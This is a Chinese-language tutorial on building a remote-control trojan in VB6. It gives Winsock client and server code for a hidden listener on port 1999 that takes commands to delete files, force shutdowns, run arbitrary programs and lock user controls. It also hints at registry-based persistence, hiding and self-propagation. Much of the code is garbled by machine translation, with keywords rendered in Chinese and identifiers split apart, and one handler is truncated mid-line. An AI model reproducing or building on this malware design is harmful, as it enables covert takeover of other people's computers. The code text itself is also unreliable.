浅谈用VB6.0编写木马程序

现在网络上流行的木马软件基本都是客户端/服务器模式，也就是所谓的C/S结构。目前，其中一些开始向B/S结构转变。这里就不详细讨论B/S结构了。本文主要介绍了C/S结构的原理，即在本机上直接启动的程序与用户具有相同的权限。所以如果能在服务器端(也就是被攻击的电脑)启动服务器程序，就可以使用相应的客户端工具客户端程序直接控制。下面说一下如何用VB实现。

首先用VB搭建两个程序，一个是客户端程序，一个是服务器端程序systry。

在客户端项目中创建一个表单，加载WinSock控件，名为tcpClient，选择TCP作为协议，添加两个文本框输入服务器的IP地址或服务器名称，然后创建一个按钮，按下该按钮可以初始化连接。代码如下:

private subcmd connect _ click()
iflen(text 1 . text)= 0和len (text2.text) = 0然后
msgbox("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(text 1。Text) > 0，然后
tcpClient。RemoteHost = Text1。text
Else
TCP . remote host = text 2 . text
end if
end if
TCP client . connect
timer 1 . enabled = true
end sub
连接建立后，可以使用DataArrival事件处理。

在服务器端systry项目中也建立了一个表单，加载了WinSock控件，称为tcpServer，协议选择TCP。将下面的代码添加到Form_Load事件中:

private subform _ Load()
TCP server . local port = 1999
TCP server . listen
end sub

准备回答客户端程序对连接的请求，使用ConnectionRequest事件回答客户端程序的请求。代码如下:

private sub TCP server _ connection request
(byval request id as long)
if TCP server。State < > sckclosedthen然后
TCP server.close '检查控件的State属性是否已关闭。
如果没有，请在接受新连接之前关闭此连接。
TCP server . accept request id
end sub
这样，客户端程序按下连接按钮后，触发服务器程序的ConnectionRequest事件，执行上面的代码。如果不出问题，连接就建立了。

连接建立后，服务器端程序通过DataArrival事件接收客户端程序发送的指令，运行已建立的程序。例如，驱动器名、目录名、文件名等。从服务器端传到客户端，客户端收到后，用TreeView控件以树的形式显示，并浏览服务器端的文件目录；强制或重新启动服务器端计算机；阻止任务栏窗口；屏蔽开始菜单；根据客户端传来的文件名或目录名删除；屏蔽热启动键；在服务器端运行任何程序；还包括获取目标计算机屏幕图像、窗口和进程列表；激活和终止远程进程；打开、关闭和移动远程窗口；控制目标电脑鼠标的移动和动作；交换远程鼠标的左右键；在目标计算机模拟键盘上输入、下载和上传文件；提取、创建和修改目标计算机系统的注册表关键字；在远程屏幕上显示消息。DataArrival的事件程序如下:

Private sub TCP server _ data arrival
(Byval byte stotal as long)
Dimstrdata as string
Dim I as string
Dim MKEY as string TCP server。Get data strdata
'接收数据并将其存储在strdata
for I = 1 to Len(strData)
分隔命令
ifmid (strData，I，1) = "@ "然后
mkey = left (strdata，I-1)
'将命令id号存储在mkey中

'将命令参数存储在strData中
strdata = right(右 文件名
2
强制关闭服务器端电脑
情况3
强制重启服务器端电脑
情况4
阻塞任务栏窗口；
情况5
屏蔽开始菜单；
情况六
根据客户端传来的文件名或目录名删除；
情况7
屏蔽热启动键；
案例8
在服务器端运行任何程序
end select
end sub
客户端用tcpClient发送命令。SendData包括命令ID和命令参数，用符号“@”分隔。

另外，当客户端与服务器断开连接时，服务器应用tcpServer_Close事件继续准备接收客户端的请求。代码如下:

Private sub TCP server _ close()
TCP server . close
TCP server . listen
end sub
这是最基本的木马程序，只要你的机器在运行。至于如何让服务器端程序运行起来，就要充分发挥你的聪明才智了。我的源程序里有一个方法，就是修改系统注册表。下载源代码

一个成功的木马程序比这个复杂，还有一些问题需要解决，比如程序隐藏、自动复制和传播。警告:千万不要用它来破坏别人的系统。